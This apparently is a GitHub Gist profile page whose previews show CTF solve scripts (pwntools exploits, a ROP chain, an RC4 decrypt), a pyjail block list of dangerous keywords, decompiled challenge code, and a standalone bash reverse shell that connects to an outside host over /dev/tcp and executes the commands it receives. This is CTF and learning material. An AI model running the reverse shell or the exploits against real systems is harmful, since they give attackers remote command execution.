Skip to content

Instantly share code, notes, and snippets.

View lionaneesh's full-sized avatar
🎯
Focusing

Aneesh Dogra lionaneesh

🎯
Focusing
223 followers · 55 following
View GitHub Profile
@lionaneesh
lionaneesh / solve_saas.py
Created June 14, 2020 09:21
SaaS from Nahamcon CTF 2020
from pwn import *
r = remote('jh2i.com', 50016)
#r = process('./saas')
def syscall(a2):
print ("syscall", a2)
for a in a2:
txt = r.recv(timeout=2).strip()
print (txt.strip(), len(txt))
r.sendline(str(a))
@lionaneesh
lionaneesh / gentooinstall.sh
Last active April 1, 2020 13:28
#!/usr/bin/env bash
NAME="Gentoo Install"
CODENAME="gentooinstall"
COPYRIGHT="Copyright (C) 2016 Nathan Shearer"
LICENSE="GNU General Public License 2.0"
VERSION="2.0.0.0"
function gentooinstall_architecture
{
@lionaneesh
lionaneesh / revshell.sh
Created April 1, 2020 12:29
revshell.sh
exec 5<>/dev/tcp/d4rkc0de.com/2334
cat <&5 | while read line; do $line 2>&5 >&5; done
@lionaneesh
lionaneesh / emu_2_parse.py
Created December 23, 2019 10:57
Solution for EMU 2.0, X-Mas CTF 2019, parsing a custom 8bit RISC micro-processor.
state = {'a': 0, 'pc': 0x100}
mem = []
blocked_addrs = []
def parse_opcode(opcode, arg):
global state
global mem
global blocked_addrs
jumped = False
x = int(arg, base=16)
@lionaneesh
lionaneesh / solve_horcruxes.py
Last active November 28, 2019 08:32
Ropping Horcruxes, pwnable.kr
from pwn import *
import re
#r = process("/home/horcruxes/horcruxes")
r = remote('0.0.0.0', 9032)
print r.recvuntil("Select Menu:")
r.send("123\n")
print r.recvuntil("earned? : ")
a = p32(0x809fe4b)
b = p32(0x809fe6a)
c = p32(0x809fe89)
@lionaneesh
lionaneesh / solve_dragon.py
Created November 18, 2019 10:35
Solve the Dragon (rookiss) from pwnable.kr
from pwn import *
#r = process('./dragon')
r = remote("pwnable.kr", 9004)
win = p32(0x08048dbf)
def select_priest():
print r.recvuntil("[ 2 ] Knight")
r.send("1\n")
@lionaneesh
lionaneesh / pyjail.py
Created November 5, 2019 10:50
pyjail, N-CTF 2019
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to pyjail!")
print("========================================================================")
print(open(__file__).read())
print("========================================================================")
print("RUN")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
@lionaneesh
lionaneesh / rms-fixed-make_request.c
Created September 23, 2019 16:03
rms-fixed, make_request, from DragonCTF 2019
signed __int64 __fastcall make_request(const struct sockaddr *a1, socklen_t a2, char *a3, char *a4, void **a5, _QWORD *a6)
{
int *v6; // rax
signed __int64 result; // rax
int *v8; // rax
size_t v9; // rax
int *v10; // rax
size_t v11; // rax
int *v12; // rax
int *v13; // rax
@lionaneesh
lionaneesh / rms-fixed.c
Created September 23, 2019 15:45
rms-fixed, source code from Dragon CTF 2019
void *__fastcall fetch(void *url_1)
{
int v1; // eax
char *v2; // rax
__int64 v3; // rdx
int *v4; // rax
void *dest; // ST78_8
uint16_t port_network; // [rsp+1Ah] [rbp-116h]
int portnumber; // [rsp+1Ch] [rbp-114h]
char *hostname; // [rsp+20h] [rbp-110h]
@lionaneesh
lionaneesh / solve_droidcon.py
Created September 19, 2019 21:24
DroidCon, Sect-ctf 2019, RC4 decrypt
from arc4 import ARC4
data='\xef\x8eX7 CD\xcc\xfb!\x03@\xf5\x10\xf8 \x18\x986\xc09\xcf\x87/\xc2h\xd1\x94\xc6\x83\xfb;aG\xfat\n\xda^\x0f\xb8\xe1]d\xb6=\xd7\xa4\x0216:\x0f\xf8\xf6j\xdeN\xc3\xd5\x82z$^\xfa\xc0\xea\xab\x14\xf1qB\x80\x9c\xc5Z\xd5\xf8\xc0(H\\2\x17_\xa0\xef\xf4\x16q\x00\xbd\x17q\xfd\x10\xef\x17\xe6\xb6\x86\xea[\xb7:\x1c\x85\x8evJ!\x1a\x9d\x00\xefP\x9eml=\x13*g3\x7f\xc7\x97\xb4\xb6'
def decrypt(key):
arc4 = ARC4(key)
config = arc4.decrypt(data)
config = str(config)
if('flag' in config):
print(config, key)